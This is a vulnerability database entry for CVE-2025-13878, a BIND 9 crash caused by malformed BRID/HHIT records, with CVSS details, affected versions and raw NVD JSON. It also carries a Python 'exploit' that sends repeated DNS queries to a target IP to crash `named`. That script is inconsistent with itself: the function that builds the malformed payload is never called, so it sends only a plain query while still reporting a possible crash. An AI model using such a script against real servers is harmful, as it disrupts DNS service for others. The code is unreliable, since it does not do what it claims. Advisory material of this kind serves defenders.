Security Vulnerability Report
中文
CVE-2025-13878 CVSS 7.5 HIGH

CVE-2025-13878

Published: 2026-01-21 15:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Malformed BRID/HHIT records can cause `named` to terminate unexpectedly. This issue affects BIND 9 versions 9.18.40 through 9.18.43, 9.20.13 through 9.20.17, 9.21.12 through 9.21.16, 9.18.40-S1 through 9.18.43-S1, and 9.20.13-S1 through 9.20.17-S1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

BIND 9.18.40 - 9.18.43
BIND 9.20.13 - 9.20.17
BIND 9.21.12 - 9.21.16
BIND 9.18.40-S1 - 9.18.43-S1
BIND 9.20.13-S1 - 9.20.17-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13878 PoC - Malformed BRID/HHIT record causing BIND 9 DoS # This PoC demonstrates sending a malformed DNS query with crafted BRID/HHIT records # Note: This is for educational and authorized testing purposes only import socket import struct import random def build_dns_query(qname, qtype): """Build a basic DNS query packet""" transaction_id = random.randint(0, 65535) flags = 0x0100 # Standard query questions = 1 # Header section header = struct.pack('>HHHHHH', transaction_id, # Transaction ID flags, # Flags 1, # Questions 0, # Answers 0, # Authority 0 # Additional ) # Question section qname_encoded = b'' for label in qname.split('.'): qname_encoded += bytes([len(label)]) + label.encode() qname_encoded += b'\x00' # End of domain name question = qname_encoded + struct.pack('>HH', qtype, 1) # Type, Class IN return header + question def create_malformed_brid_record(): """Create a malformed BRID record payload""" # BRID record type is 0x0029 (41) # Craft malformed BRID data to trigger the vulnerability brid_type = 41 brid_payload = b'\x00' * 4 + b'\xff\xff\xff\xff' # Malformed data return brid_type, brid_payload def send_malformed_dns_query(target_ip, target_port=53): """Send malformed DNS query to trigger CVE-2025-13878""" try: # Create socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Build query with malformed BRID record qname = "test.example.com" query = build_dns_query(qname, 41) # BRID record type # Send the malformed query print(f"[*] Sending malformed DNS query to {target_ip}:{target_port}") sock.sendto(query, (target_ip, target_port)) # Wait for response sock.settimeout(5) try: response, addr = sock.recvfrom(4096) print(f"[+] Received response from {addr}") except socket.timeout: print("[-] No response received (target may be vulnerable)") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False def exploit_brid_vulnerability(target_ip): """ Exploit function to trigger the BIND 9 BRID/HHIT vulnerability This sends multiple malformed requests to increase exploit reliability """ print("=" * 60) print("CVE-2025-13878 - BIND 9 Malformed BRID/HHIT DoS Exploit") print("=" * 60) # Send multiple malformed queries for i in range(5): print(f"[*] Attempt {i+1}/5") send_malformed_dns_query(target_ip) print("\n[!] If target is vulnerable, named process should have crashed") print("[!] Check DNS service status on target system") if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] exploit_brid_vulnerability(target) else: print(f"Usage: python {sys.argv[0]} <target_ip>") print("Example: python CVE-2025-13878.py 192.168.1.100")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13878", "sourceIdentifier": "[email protected]", "published": "2026-01-21T15:16:05.650", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malformed BRID/HHIT records can cause `named` to terminate unexpectedly.\nThis issue affects BIND 9 versions 9.18.40 through 9.18.43, 9.20.13 through 9.20.17, 9.21.12 through 9.21.16, 9.18.40-S1 through 9.18.43-S1, and 9.20.13-S1 through 9.20.17-S1."}, {"lang": "es", "value": "Registros BRID/HHIT malformados pueden causar que 'named' termine inesperadamente.\nEste problema afecta a las versiones de BIND 9 9.18.40 hasta 9.18.43, 9.20.13 hasta 9.20.17, 9.21.12 hasta 9.21.16, 9.18.40-S1 hasta 9.18.43-S1, y 9.20.13-S1 hasta 9.20.17-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.44", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.20.18", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.21.17", "source": "[email protected]"}, {"url": "https://kb.isc.org/docs/cve-2025-13878", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/21/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.